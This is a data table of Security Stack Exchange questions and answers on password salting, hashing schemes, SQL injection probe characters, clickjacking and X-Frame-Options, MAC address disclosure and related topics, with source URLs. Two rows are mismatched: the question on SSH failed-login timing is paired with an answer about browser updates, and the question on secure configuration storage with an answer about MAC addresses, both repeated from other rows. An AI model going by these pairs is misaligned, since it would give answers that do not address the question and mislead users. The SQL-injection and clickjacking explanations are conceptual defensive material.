source_id (int64, 1–4.64M) | question (string, 0–28.4k chars) | response (string, 0–28.8k chars) | metadata (dict) |
---|---|---|---|
66,989 | I don't understand how using a random salt for hashing passwords can work. Perhaps random salt refers to something other than hashing passwords? Here is my thought process: The salt is used to add extra junk to the end of a password prior to hashing it, to fight against the likelihood of being cracked by a rainbow table. However, to ensure you can still verify a password is correct, you must use the same salt for each password prior to encrypting it to see if it matches the hash saved for a certain user. If a random salt is used, how can that password ever be verified again? Is the random salt saved somewhere to be used for each encryption? Seems less secure to me if the salt is saved right alongside the hashed password, rather than using some kind of computed salt an attacker would not inherently know if they got a hold of your data. I'm not sure if I'm missing something here, or if random salting has to do with a different scenario in encryption, and doesn't make sense in this particular case. How can a random salt work in the above case of hashing passwords prior to encrypting? | Is the random salt saved somewhere to be used for each encryption? Yes Seems less secure to me if the salt is saved right alongside the hashed password, rather than using some kind of computed salt an attacker would not inherently know if they got a hold of your data. It's not, because the only thing a salt does and was invented to do is, as you said: to fight against the likelihood of being cracked by a rainbow table and nothing more. It adds complexity to a single password - and for every password in a database, it is unique. To verify the password, you need to store the salt alongside the hashed password. This doesn't compromise the security of that single password in the least bit - the hash algorithm is still as secure as without a salt. But, looking at the whole database, every password is better protected against rainbow attacks, because the attacker must calculate every single hash with the respective salt separately and cannot do bulk operations on them. | {
"source": [
"https://security.stackexchange.com/questions/66989",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26671/"
]
} |
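A minimal Python sketch of the store-the-salt-next-to-the-hash scheme described in the answer above (illustrative only, not the original poster's code; it assumes the standard-library hashlib and secrets modules and an arbitrarily chosen PBKDF2 iteration count):

```python
import hashlib
import secrets

ITERATIONS = 200_000  # illustrative work factor; tune for your hardware

def hash_password(password: str) -> tuple[bytes, bytes]:
    """Return (salt, digest). The salt is random per password and stored in the clear."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password: str, salt: bytes, stored_digest: bytes) -> bool:
    """Re-hash the candidate password with the stored salt and compare."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return secrets.compare_digest(candidate, stored_digest)

# The salt is saved right next to the hash -- that is fine: it only defeats
# precomputed (rainbow) tables, it is not a secret.
salt, digest = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, digest))  # True
print(verify_password("wrong guess", salt, digest))                   # False
```

Verification simply repeats the hash with the stored salt, which is why storing the salt in the clear costs nothing.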
67,110 | Since I was a teenager (that's 20 years ago) and to this day, you see movies with professionals stealing a super-computer and using it to crack a password or a home security system using brute-force (I assume). However, they always demonstrate this by showing them trying to crack a pin or a password that consists of many digits/characters, and the super-computer cracks the fields one by one. The green digits on the left have been cracked, the ones on the right yet to come. The super-computer tries to figure out the first digit, then the second and so on; you see the numbers keep fluctuating until they get locked on the right digit. Does such an attack even exist? | What you see in the movies is a plot device to ratchet up tension; every time a character is determined it gives the audience a kick. Reality is a bit different. Brute-force attacks do exist, however it's all or nothing - you either get the whole passcode right or wrong. There's no way to know whether you have guessed a correct character. Passcodes are typically hashed, where changing a single digit will return a completely different cryptographic result. You could get all but a single character right and you wouldn't have any indication you came close. So real password cracking might be a bit boring from a movie point of view, where you need to show progression to maintain audience interest. What they could do is show a progression bar for the calculation of all possible permutations of a hash, but it wouldn't have a predictable end time - you could get lucky and hit it right away, or get it towards the end of your brute force range. Not necessarily good for a movie, but a good director could pull it off. | {
"source": [
"https://security.stackexchange.com/questions/67110",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31356/"
]
} |
67,271 | For all of my hobby web projects, I have coded a login system that these projects share. There is no critical data in these projects; the only critical data could be reused passwords. So I try to hash passwords in a very secure way. My current password hashing algorithm is nothing I would call really secure. And as I saw that PHP now offers built-in hashing with password_hash, I thought about switching. My question is, what are the benefits of switching for me? In terms of: what extra protection do I get, what hole(s) do I fix, etc.? And is there anything else I have to do to not make it extremely insecure? I would like to use the answers as a learning experience for myself so I can teach it to others who are in my position. My current algorithm (pseudo-code): Salt = "some-salt"
Repeat 1000000 times
Password = Sha512(Salt + username + Salt + Password) I know my site is vulnerable to timing attacks and the PHP built-in functions would fix that. What else is obviously insecure? | For starters, you rolled your own password hashing algorithm. There are currently but three password hashing algorithms which are considered secure: PBKDF2, scrypt and bcrypt. You are iterating and you are appending a salt. You also seem to add the username within the algorithm, which does not add any benefit as you are already using a salt. What I can't deduce from your code, and which is very important, is the length of your salt and how you generate it. A salt should never be hardcoded, but generated with a secure random generator when hashing the password. The salt should be unique within the database and preferably globally unique, so as to avoid identification of similar passwords in different databases (hence a username is not considered a good salt). Also, the way PBKDF2 works (which leans closest to your implementation) is by using an HMAC, where the password is used as the HMAC key over the randomly generated salt and a block counter, rather than simply appending everything together. PHP's password_hash is using the bcrypt algorithm. So to summarize what you gain by using a standard algorithm instead of your own: you will generate random salts, and you will use a standardized and secure password hashing algorithm. | {
"source": [
"https://security.stackexchange.com/questions/67271",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55397/"
]
} |
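As a contrast to the hand-rolled SHA-512 loop in the question above, here is a minimal Python sketch of the same task done with one of the vetted KDFs the answer lists (scrypt). This is an illustration only, not PHP's password_hash (which, as the answer notes, uses bcrypt); the scrypt cost parameters and the example password are assumptions:

```python
import hashlib
import secrets

def make_hash(password: str) -> dict:
    """Hash a password with scrypt and a fresh random salt,
    instead of a hand-rolled SHA-512 loop with a hardcoded salt."""
    salt = secrets.token_bytes(16)          # never hardcoded, unique per password
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return {"salt": salt.hex(), "hash": digest.hex(), "kdf": "scrypt"}

def check_hash(password: str, record: dict) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    digest = hashlib.scrypt(password.encode(),
                            salt=bytes.fromhex(record["salt"]),
                            n=2**14, r=8, p=1)
    return secrets.compare_digest(digest.hex(), record["hash"])

record = make_hash("hunter2")
print(check_hash("hunter2", record))   # True
print(check_hash("hunter3", record))   # False
```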
67,278 | I was surfing a random blog today ( Enterprise video conferencing solutions vs Skype ), and I came across a claim. I do know that the Skype protocol is a proprietary one, but the author of this blog claims that: Skype makes use of peer to peer technology in which Skype users become supernodes. This allows Skype to tap on your bandwidth to route other calls, often slowing down your computer. What I would like to know, from a networking standpoint, is how is this implemented or even possible? First of all, why is there a need to route calls between user nodes? If person X is calling Y, then isn't it a straightforward TCP connection from X to Y nodes? Why does a Z node have to come in between? Moreover, if this is true, why do most users stick with Skype? Aren't there better opensource technologies available in this arena? | Today, Skype does not route communication through other users' machines. This is done by Microsoft servers in datacenters. But back in the day, in the early versions of the Skype protocol, every user with strong enough bandwidth who was not behind a NAT (i.e., with a routable IP address) could become a supernode and route the traffic of other users that were behind NAT. That's the reason why this is necessary: if your ISP is doing NAT at the gateway level, for example, you can open a TCP connection to any host you want, but some other unknown host can't reach you, because the incoming connection was not requested by you. That's how NAT works, and a direct TCP/UDP connection can't be established. If two Skype users that are behind a NAT want to talk to each other, in normal conditions they can't, because they can only send requests and receive the replies, but can't receive something that was not requested earlier. Example:
Host A wants to talk through Skype with Host B.
Host A tries to open a TCP/UDP connection to Host B, but Host B didn't request anything from Host A earlier, and the NAT on Host B's gateway just drops the connection. The same happens in the reverse direction. So, in order to communicate, they both connect to some supernode that becomes a bridge between them. This works because each client transmits its data to the supernode, and the supernode routes it to the other side (which is also connected to the supernode, as I mentioned before). Becoming a supernode could be disabled in early Skype versions with a change in the Windows Registry. | {
"source": [
"https://security.stackexchange.com/questions/67278",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29391/"
]
} |
67,285 | I know that it is still not very easy to use PGP for an average user. However, the situation is improving (there are some easy plugins that can even nicely integrate into your GMail webmail). In addition, the press releases of the last time may have encouraged people to think about their safety a little more. What is the best way to tell people that I am capable of encrypting emails using the OpenPGP standard? Possible solutions could be: Sign each outgoing mail However, this will always produce a lot of text even for a small message. This would definitely annoy me if I do not know anything about it or if I don't care. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Hi, yes that is okay.
-----BEGIN PGP SIGNATURE-----
[ a lot of stuff ]
-----END PGP SIGNATURE----- Include a text in the signature of the mail One could write something like: Please note that unencrypted emails can be easily intercepted and read by third parties. For transmitting confidential information please consider encrypting your emails. My PGP key fingerprint is XX XX XX XX XX XX XX. Are there any suggestions on how to write that more precisely while keeping it short and sweet? Asking them directly to encrypt their mails What are the pros/cons of each solution, and how can you show people that it may take less than five minutes to install an appropriate browser plugin and to generate a key pair with it? Should I offer to assist them? | Signing mails is in my experience the best method to show others they can send you encrypted mail. If they're using OpenPGP anyway, their mail client might even automatically enable encrypted mails as replies to signed ones. Recently I was very surprised to receive (S/MIME) encrypted mail from both a bank and a health care institute, just because I signed the mails I sent them. You don't need to (and shouldn't anyway) use clear text (inline) signatures (with all their bulk), although they're a very visible hint that you're accepting OpenPGP encrypted mail. It might be worth using this if you especially want to prompt others to send encrypted mail, to advertise your capability of doing so, or just to make them curious... Instead, there is also PGP/MIME, which will not distract anybody (but I think users of MS Outlook might see some attachment they don't understand), but still offers the advantages to other OpenPGP users described above. Always signing mail (using PGP/MIME or S/MIME) produces some background noise, but it doesn't disturb anybody, nobody has to care about a few additional bits in each mail, and you might get awareness for signing and encryption into the subconscious mind. This worked out pretty well for me; I got quite a bunch of people around me to sign and encrypt mail this way (or do it again, and regularly). Put your fingerprint into your signature and on your business card. Expect to get asked about it, and be ready to explain what that's all about. Put your public key on keyservers. Lots of mail clients with support for OpenPGP automatically query them, especially after receiving signed mail. Talk to others. Ask them to send confidential information encrypted. Encrypting mails is rather easy, and the sender doesn't even have to create his own key pair. Guiding others is rather easy, even on the phone, if you have tried the most relevant plugins yourself. Consider also using S/MIME, even if it's "just" a CAcert certificate. Even if the certificate is not trusted, most mail clients support S/MIME out of the box, and replying with encrypted mail is much easier than with OpenPGP: no plugins required, and the certificate is automatically attached to your mail, so the replying sender just has to click the "encrypt" button. | {
"source": [
"https://security.stackexchange.com/questions/67285",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55411/"
]
} |
67,295 | Is there a threat from screenshots with blacked out info? That is can someone take out that aftermarket addition so to speak? For instance I take a screenshot (using MS snipper) Then I 'blur/blackout' some info Is the picture above vulnerable to someone looking through its hex values for that extra green layer and just removing it, thus reconstructing the original image (or any other way to 'take off' my attempt of redacting info)? To make it more secure I always then open up the blurred out screen and then screen capture that. Does the above screen of a screen add better security -there is no way to reconstruct missing data because nothing is "missing"? I have always been paranoid but after finding out a colleague does the same thing, I'd thought I'd ask. update So I compared pics one and two (from above) and looked at the hex values, the metadata had not changed at all and the only change was within the image data itself (results below). The results are specific to this particular editor and process. The possibility (likelihood) does exist for data to be recovered if using other tools. | Usually the PNG format does not support multiple layers. So when you draw over something, whatever was there before is lost. However, the PNG format supports storage of an unlimited amount of metadata which is usually not displayed by image viewers. This feature is often used by image editors to add additional metadata to the image. One possible use-case is to store the undo-history of the image. This could mean that the previous version can be restored. To prevent this, make sure to set the exporting settings of your editor in a "export for web" mode which is supposed to strip all unnecessary data from the file. How to do this (and if it is even necessary) depends on the image editor. Another possible faux-pas is to use an image blurring method which isn't 100% effective. You could, for example, accidentally set the opacity of your brush to almost but not completely 100%, which would mean that the section isn't recognizable by the human eye but might be made readable again by enhancing the contrast of the section. Another mistake is to use a filter which is reversible. I remember a case of a child-pornographer who got caught because he blurred out his own face with the "twirl" filter in Photoshop not realizing that when the same filter is applied in reverse, the image is restored to almost the original . | {
"source": [
"https://security.stackexchange.com/questions/67295",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/43611/"
]
} |
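Following the advice above about editors embedding undo history or other metadata in PNG files, here is a small Python sketch of one way to keep only the flattened, visible pixels. It is an illustration only, not taken from the post; it assumes the third-party Pillow library and hypothetical file names:

```python
from PIL import Image  # third-party: pip install pillow

def flatten_and_strip(src_path: str, dst_path: str) -> None:
    """Re-create the image from its visible pixels only.

    Ancillary PNG chunks in the source file (text comments, editor
    undo history, thumbnails, etc.) are simply not copied over.
    """
    with Image.open(src_path) as src:
        rgba = src.convert("RGBA")            # normalize mode; drops palette quirks
        flat = Image.new("RGBA", rgba.size)
        flat.putdata(list(rgba.getdata()))    # copy pixel values, nothing else
        flat.save(dst_path, format="PNG")

flatten_and_strip("redacted_screenshot.png", "redacted_screenshot_clean.png")
```

This has the same effect as the asker's screenshot-of-a-screenshot habit without the extra round trip, but it does nothing to repair a weak redaction: the blackout itself must still be fully opaque.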
67,362 | I have just received this email from AbeBooks.com: Hello AbeBooks Customer, This is an important message from AbeBooks.com. As part of our routine security monitoring, we have learned that a
list of email addresses and passwords were posted online this week. While the list was not AbeBooks-related, we know that many people
reuse their passwords on several websites. We believe your email
address and password set was on the list posted online. Therefore we have taken the precaution of disabling your password on
your account. We apologize for any inconvenience this has caused but
felt that it was necessary to help protect you and your AbeBooks
account. I don't care so much about my AbeBooks.com account as I barely use it. But, I am very worried to know that my email and password are published online. Although I tried to Google for my email and haven't found anything. What should I do now? Should I change the passwords in all my 50+ accounts? | Probably the most comprehensive database of searchable compromised accounts is haveibeenpwned.com . If you've reused the password in multiple places then yes you should assume that password has been compromised. I also recommend enabling two-factor authentication wherever possible as this will reduce the risk of one account being compromised leading to other accounts being compromised. | {
"source": [
"https://security.stackexchange.com/questions/67362",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27908/"
]
} |
67,427 | I know that there are different types of authentication mechanisms available. One among them is HTTP authentication. What is the danger in using this method compared to other methods? | Basic authentication has a number of drawbacks, one of which is that the username and password are passed in the clear with every request. This is clearly unsafe under HTTP, but is somewhat less vulnerable under HTTPS. However, because the credentials are submitted with every request, it's still worse than any other method (including digest) that does not have this limitation. The primary reason is that now every single request can be a target for cleartext credential theft, not just an initial login request. In most systems, after login, the most an attacker can hope to retrieve is a session or authentication token. With basic auth, any request is an opportunity to steal the user's password. This is not ideal. Digest auth is somewhat better in that it sends an MD5 digest of various bits including the username, password, and a nonce (among other values) and not the cleartext credentials...A password cannot be extracted from a captured digest. With HTTP authentication (in any form) you're also dependent on the client to provide the authentication user experience, which can have its own issues and so needs to be well tested with the clients you expect to be using your application. In the past, for instance, I've seen specific browsers fail to authenticate because of certain special characters in a password. With application-based authentication UX, you have control over this. With HTTP auth, you do not. Another attack (and it's a very minor one) is that if you display user-generated, externally hosted content on your site, you open yourself up to very subtle 401 phishing attacks. Since your users are used to the client's chrome for HTTP authentication, they won't necessarily notice if they get an authentication prompt on your site for a slightly different domain. Depending on your application, this may not be a valid threat at all, but it's certainly something to consider if you go down the HTTP auth route. | {
"source": [
"https://security.stackexchange.com/questions/67427",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55343/"
]
} |
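To make the "passed in the clear with every request" point above concrete, here is a short Python sketch (illustrative only, with made-up credentials) showing that the Authorization header used by Basic authentication is plain reversible Base64, not a hash:

```python
import base64

# What a client sends on EVERY request when using HTTP Basic auth:
username, password = "alice", "s3cret-password"        # hypothetical credentials
token = base64.b64encode(f"{username}:{password}".encode()).decode()
print(f"Authorization: Basic {token}")

# Anyone who can read the request (or a log that captured it) gets the
# password back with a single decode -- there is no hashing involved:
print(base64.b64decode(token).decode())   # -> alice:s3cret-password
```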
67,439 | I've noticed, based on the logging of my NAS, that my IP address is targeted by a hacker. I already took action by automatically banning the IP address permanently after five unsuccessful login attempts. Unfortunately, the attack is being carried out using multiple different IP addresses, so to me this security measure is not sufficient, as it only works until the hacker runs out of IP addresses or gets the right username/password combination. Which sounds rather tricky to me, and I don't want to wait until one of these two events happens. I googled some of the IP addresses which are banned and they show up on several 'hacker' sites as hacker IP addresses. Should I do something and are my worries justified? | As for anything attached to public networks: Reduce your attack surface - can you remove the NAS from the Internet? Can you limit the IPs that are allowed to connect? Increase the cost of attack - lockouts are great, but also make sure that you have a complex password and that you change it regularly Monitor access - keep your eye on who successfully logs in Treat the risks - have a plan for the event when someone actually breaks in. Can the NAS be used to access the rest of your network? Is there anything on it that would be a risk if it fell into the wrong hands? Do you have backups? | {
"source": [
"https://security.stackexchange.com/questions/67439",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55555/"
]
} |
67,486 | I noticed that today after I scanned a site on the Qualys SSL Labs site that SSL ciphersuites which use SHA1 are now highlighted as being "Weak". It seems this has just happened; I scan sites pretty regularly and haven't seen this before. We have all known for some time that SHA1 has some weaknesses. Does this change reflect some new problems with SHA1? Has something officially changed in the industry to now have SHA1-based ciphersuites considered "weak"? Or is this just something the Qualys site is choosing to do now? | Nothing has changed in the industry. Qualys is now just highlighting what we already know. It is to give you a reminder that you should move away from SHA-1. It's not generally considered a critical problem yet, but should be sorted as part of normal refresh/update cycles. | {
"source": [
"https://security.stackexchange.com/questions/67486",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/53029/"
]
} |
67,596 | Is it in general a security problem not to update your browser. Firefox constantly prompts me to update my browser, but how dangerous is it to not update? As part of this question, I would like to know what that problem exactly is. What are the risks of not updating your browser? What exactly could happen? | Because there are security vulnerabilities found in software all the time. These vulnerabilities are sometimes publicly disclosed, sometimes not. Either way, as developers find or find out about them they patch them. Running old versions of browsers leaves you vulnerable to malicious websites trying to infect your computer. Below are links to web pages listing vulnerabilities that have been fixed in relatively recent versions of the 3 most popular browsers. Microsoft Internet Explorer Mozilla Firefox Google Chrome All browsers are going to have bugs, and all of them will have vulnerabilities. But staying on top of known vulnerabilities can help prevent attackers from gaining access to your system. Edit Thanks to kirb for these extra links to up-to-date blogs of browser security updates IEBlog Google Chrome Releases | {
"source": [
"https://security.stackexchange.com/questions/67596",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10435/"
]
} |
67,602 | I have a raspberry-pi (running GNU/Linux) and I recently allowed my router to forward port 22 (ssh) to the raspberry-pi so that I could log in while away from home. I then noticed a bunch of apparent break-in attempts (failed root logins coming from a chinese ip address) in auth.log, and I have a couple questions about the timing of the failed root logins. Here's a snippet from my /var/log/auth.log file (the first number is just the line number from vi): 5966 Sep 7 11:50:19 raspberrypi sshd[13759]: Failed password for root from 122.225.103.125 port 34328 ssh2
5967 Sep 7 11:50:20 raspberrypi sshd[13755]: Failed password for root from 122.225.103.125 port 32582 ssh2
5968 Sep 7 11:50:20 raspberrypi sshd[13763]: Failed password for root from 122.225.103.125 port 35381 ssh2
5969 Sep 7 11:50:21 raspberrypi sshd[13759]: Failed password for root from 122.225.103.125 port 34328 ssh2
5970 Sep 7 11:50:22 raspberrypi sshd[13763]: Failed password for root from 122.225.103.125 port 35381 ssh2
5971 Sep 7 11:50:24 raspberrypi sshd[13767]: Failed password for root from 122.225.103.125 port 39706 ssh2
5972 Sep 7 11:50:24 raspberrypi sshd[13763]: Failed password for root from 122.225.103.125 port 35381 ssh2
5973 Sep 7 11:50:25 raspberrypi sshd[13771]: Failed password for root from 122.225.103.125 port 40360 ssh2
5974 Sep 7 11:50:26 raspberrypi sshd[13767]: Failed password for root from 122.225.103.125 port 39706 ssh2
5975 Sep 7 11:50:26 raspberrypi sshd[13771]: Failed password for root from 122.225.103.125 port 40360 ssh2
5976 Sep 7 11:50:28 raspberrypi sshd[13767]: Failed password for root from 122.225.103.125 port 39706 ssh2
5977 Sep 7 11:50:28 raspberrypi sshd[13775]: Failed password for root from 122.225.103.125 port 41540 ssh2
5978 Sep 7 11:50:29 raspberrypi sshd[13771]: Failed password for root from 122.225.103.125 port 40360 ssh2
5979 Sep 7 11:50:31 raspberrypi sshd[13775]: Failed password for root from 122.225.103.125 port 41540 ssh2
5980 Sep 7 11:50:31 raspberrypi sshd[13767]: Failed password for root from 122.225.103.125 port 39706 ssh2
5981 Sep 7 11:50:31 raspberrypi sshd[13771]: Failed password for root from 122.225.103.125 port 40360 ssh2
5982 Sep 7 11:50:33 raspberrypi sshd[13775]: Failed password for root from 122.225.103.125 port 41540 ssh2
5983 Sep 7 11:50:33 raspberrypi sshd[13771]: Failed password for root from 122.225.103.125 port 40360 ssh2
5984 Sep 7 11:50:34 raspberrypi sshd[13767]: Failed password for root from 122.225.103.125 port 39706 ssh2
5985 Sep 7 11:50:35 raspberrypi sshd[13775]: Failed password for root from 122.225.103.125 port 41540 ssh2
5986 Sep 7 11:50:35 raspberrypi sshd[13771]: Failed password for root from 122.225.103.125 port 40360 ssh2
5987 Sep 7 11:50:36 raspberrypi sshd[13767]: Failed password for root from 122.225.103.125 port 39706 ssh2
5988 Sep 7 11:50:37 raspberrypi sshd[13775]: Failed password for root from 122.225.103.125 port 41540 ssh2
5989 Sep 7 11:50:38 raspberrypi sshd[13779]: Failed password for root from 122.225.103.125 port 46112 ssh2
5990 Sep 7 11:50:39 raspberrypi sshd[13775]: Failed password for root from 122.225.103.125 port 41540 ssh2 And, here's a snippet from my /etc/pam.d/login file (the first number is just the line number from vi): 9 auth optional pam_faildelay.so delay=3000000 As you can see the delay is set in pam.d/login to three seconds... However the failed root logins are coming at about 1 second apart. How is this possible? Is it because the logins are coming from different ports or ttys? Also, when I try to emulate this behavior myself by putting in the wrong root password, I find that after three attempts I get disconnected and this shows up in auth.log like: 231 Sep 17 11:51:57 raspberrypi sshd[17591]: Failed password for root from 192.168.42.71 port 34208 ssh2
232 Sep 17 11:52:01 raspberrypi sshd[17591]: Failed password for root from 192.168.42.71 port 34208 ssh2
233 Sep 17 11:52:04 raspberrypi sshd[17591]: Failed password for root from 192.168.42.71 port 34208 ssh2
234 Sep 17 11:52:04 raspberrypi sshd[17591]: Connection closed by 192.168.42.71 [preauth] My three failed attempts are spaced out by at least 3 seconds (as specified in pam.d/login). How is it possible for whoever is trying to break in to make more that one attempt every three seconds and why is the connection not being closed after three failed attempts? Any help understanding this behavior would be greatly appreciated. Feel free to give references if you are not in the mood to type out an answer. Oh, also, if anyone has any idea as to how my ip address was targeted or if it is just random, I would be interested to hear about it. | Because there are security vulnerabilities found in software all the time. These vulnerabilities are sometimes publicly disclosed, sometimes not. Either way, as developers find or find out about them they patch them. Running old versions of browsers leaves you vulnerable to malicious websites trying to infect your computer. Below are links to web pages listing vulnerabilities that have been fixed in relatively recent versions of the 3 most popular browsers. Microsoft Internet Explorer Mozilla Firefox Google Chrome All browsers are going to have bugs, and all of them will have vulnerabilities. But staying on top of known vulnerabilities can help prevent attackers from gaining access to your system. Edit Thanks to kirb for these extra links to up-to-date blogs of browser security updates IEBlog Google Chrome Releases | {
"source": [
"https://security.stackexchange.com/questions/67602",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/49741/"
]
} |
67,889 | I did a small test on Chrome (V37) today. I created a small page and loaded it to the browser: <!DOCTYPE html>
<html>
<head>
<title>Untitled Document</title>
</head>
<body>
<p>Normal page</p>
<iframe src="https://security.stackexchange.com/" />
</body>
</html> Inspecting the console I found this error message: Refused to display ' https://security.stackexchange.com/ ' in a frame because it set 'X-Frame-Options' to 'SAMEORIGIN'. Why do browsers need to enforce same-origin policy on iframe s? | Review: Same-origin policy First, let's clarify that the behavior observed here (the iframe does not render) is much stricter than the default same-origin policy. If you already understand that, skip down to " What's actually happening ," below. To review, the same-origin policy prevents scripts from having programmatic access to the contents of cross-origin resources. Consider how the same-origin policy applies to various types of resources: Images: An <img> tag will show a cross-origin image to a user visually, but it will not allow a script to read the image content when loaded into a <canvas> (i.e., toDataURL will fail if the canvas contains any cross-origin images) Scripts: Cross-origin scripts will run when referenced in a <script> element, but the page can only run the script, not read its contents. Iframe: Like images, the contents of a framed cross-origin page appear visually to the user, but scripts in the outer framing page are not allowed access to the framed page's contents. The same-origin policy applies to iframes for the same reason it applies to all other types of resources: the web page being framed (or the image being displayed, or the resource being accessed via Ajax) is fetched using credentials from the resource's own origin (e.g., the HTTP request to fetch a resource from google.com includes my browser's cookies set for google.com ). The page that issued the request should not be given read-access to a resource fetched with credentials from a different origin. What's actually happening: X-Frame-Options However, the behavior you see here is stricter than the same-origin policy: the framed page is not shown at all . The cross-origin server that hosts the (would-be) framed page requests this blocking behavior by sending an X-Frame-Options response header , which specifies how the page is allowed to be framed. DENY The page cannot be displayed in a frame, regardless of the site attempting to do so. SAMEORIGIN The page can only be displayed in a frame on the same origin as the page itself. ALLOW-FROM uri The page can only be displayed in a frame on the specified origin. Here, the site sends X-Frame-Options: SAMEORIGIN , which means the site can only be framed by pages with the same origin as the framed page. From a security standpoint, this is done to prevent clickjacking (also called a "UI redress" attack). In a clickjacking attack, the page displays a click-activated component of another site inside an <iframe> and tricks the user into clicking it (usually by layering the the target component on top of an apparently-clickable feature of the framing site). For a trivial example, a site might position a transparent <iframe> of http://security.stackexchange.com so that the "log out" link in the framed site was directly over top of a "Click here to claim your free money" button. When viewing the framing page, the user attempts to claim the free money, and suddenly finds himself logged out of Stack Exchange. When http://security.stackexchange.com sends an X-Frame-Options: SAMEORIGIN header, the malicious cross-origin page gets only an empty <iframe> instead; the user doesn't unwittingly click a log-out link because no content from the framed site made it onto the rendered page. 
OWASP has a page detailing defenses against clickjacking . | {
"source": [
"https://security.stackexchange.com/questions/67889",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/53150/"
]
} |
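As a concrete server-side illustration of the header discussed above, here is a minimal Python sketch that attaches X-Frame-Options: SAMEORIGIN (and its modern CSP equivalent) to every response. It uses the third-party Flask framework purely as an example; nothing in the question implies the framed site is built this way:

```python
from flask import Flask   # third-party: pip install flask

app = Flask(__name__)

@app.route("/")
def index():
    return "<p>Sensitive page with a log-out link</p>"

@app.after_request
def set_frame_options(response):
    # Tell browsers to refuse rendering this page inside a cross-origin
    # <iframe>, which is what produces the console error in the question.
    response.headers["X-Frame-Options"] = "SAMEORIGIN"
    # The modern equivalent is the CSP frame-ancestors directive:
    response.headers["Content-Security-Policy"] = "frame-ancestors 'self'"
    return response

if __name__ == "__main__":
    app.run(port=5000)
```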
67,893 | When posting questions, it is often quite useful to include debug output. However, it sometimes includes the MAC address of my laptop, router, or both. What are the possible dangers of releasing these MAC addresses publicly? | Disclosing the MAC address in itself shouldn't be a problem. MAC addresses are already quite predictable, easily sniffable, and any form of authentication dependent on them is inherently weak and shouldn't be relied upon. MAC addresses are almost always only used "internally" (between you and your immediate gateway). They really don't make it to the outside world and thus cannot be used to connect back to you, locate you, or otherwise cause you any direct harm. The disclosure can be linked to your real identity since it might be possible to track you using data collected from WiFi networks, or it can be used to falsify a device's MAC address to gain access to some service (mostly some networks) on which your MAC address is white-listed. Personally, I wouldn't really worry about it. However, when it's not inconvenient, I usually try to redact any irrelevant information when asking for help or sharing anything. | {
"source": [
"https://security.stackexchange.com/questions/67893",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/36681/"
]
} |
67,900 | What is a proper or, if possible to tell, the best way to store configuration in matters of security? So far I can tell that a database with very restricted access is a good way, but please let's exclude the database for the moment. I'm talking about things like encrypted properties files. As this is already a suggestion, I would also like to know about something like common mistakes or things I definitely have to keep in mind to acquire a secure configuration. There are already related discussions on "the best way to store configuration", however I wasn't able to find something with focus on security. The application runs non-distributed on a host-machine, so the configuration is stored on local system. The application is, so to say, a single user application. We are talking about something like a software-firewall to be concrete. I'm actually thinking of application-scoped settings. I need data protection in a sense of privacy (I don't want to expose functionality and configuration) and integrity. I'm not afraid of an insider (admin) but more of intruders. I already asked this question on stackoverflow but I think it is more appropriate to ask it here. I will delete the stackoverflow post in timely manner. | Disclosing the MAC address in itself shouldn't be a problem. MAC addresses are already quite predictable , easily sniffable , and any form of authentication dependent on them is inherently weak and shouldn't be relied upon. MAC addresses are almost always only used "internally" (between you and your immediate gateway). They really don't make it to the outside world and thus cannot be used to connect back to you, locate you, or otherwise cause you any direct harm. The disclosure can be linked to your real identity since it might be possible to track you using data collected from WiFi networks, or it can be used to falsify a device's MAC address to gain access to some service (mostly some networks) on which your MAC address is white-listed. Personally, I wouldn't really worry about it. However, when it's not inconvenient, I usually try to redact any irrelevant information when asking for help or sharing anything. | {
"source": [
"https://security.stackexchange.com/questions/67900",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55923/"
]
} |
67,972 | It has been seen that security testers input either ' or ; into the application entry points to test for SQL injection. Why are these characters used? | The character ' is used because it is the string delimiter in SQL. With ' you delimit strings, and therefore you can test whether the strings are properly escaped in the targeted application or not. If they are not properly escaped, you can end any string supplied to the application and add other SQL code after that. The character ; is used to terminate SQL statements. If you can send the character ; to an application and it is not escaped outside a string (see above), then you can terminate any SQL statement and create a new one, which creates a security hole. | {
"source": [
"https://security.stackexchange.com/questions/67972",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55343/"
]
} |
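To see why a lone ' is such an effective probe, here is a small self-contained Python sketch (the table and data are made up for illustration) that first builds a query by string concatenation and then shows the parameterized form that is not affected:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'hunter2')")

probe = "x' OR '1'='1"   # the tester's input, built around a single quote

# Vulnerable: the quote in the input closes the SQL string early and the
# rest of the input becomes SQL, so the WHERE clause is always true.
unsafe_sql = "SELECT * FROM users WHERE name = '" + probe + "'"
print(conn.execute(unsafe_sql).fetchall())      # leaks every row

# Safe: the input is passed as a bound parameter, never parsed as SQL.
safe_sql = "SELECT * FROM users WHERE name = ?"
print(conn.execute(safe_sql, (probe,)).fetchall())  # returns nothing
```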
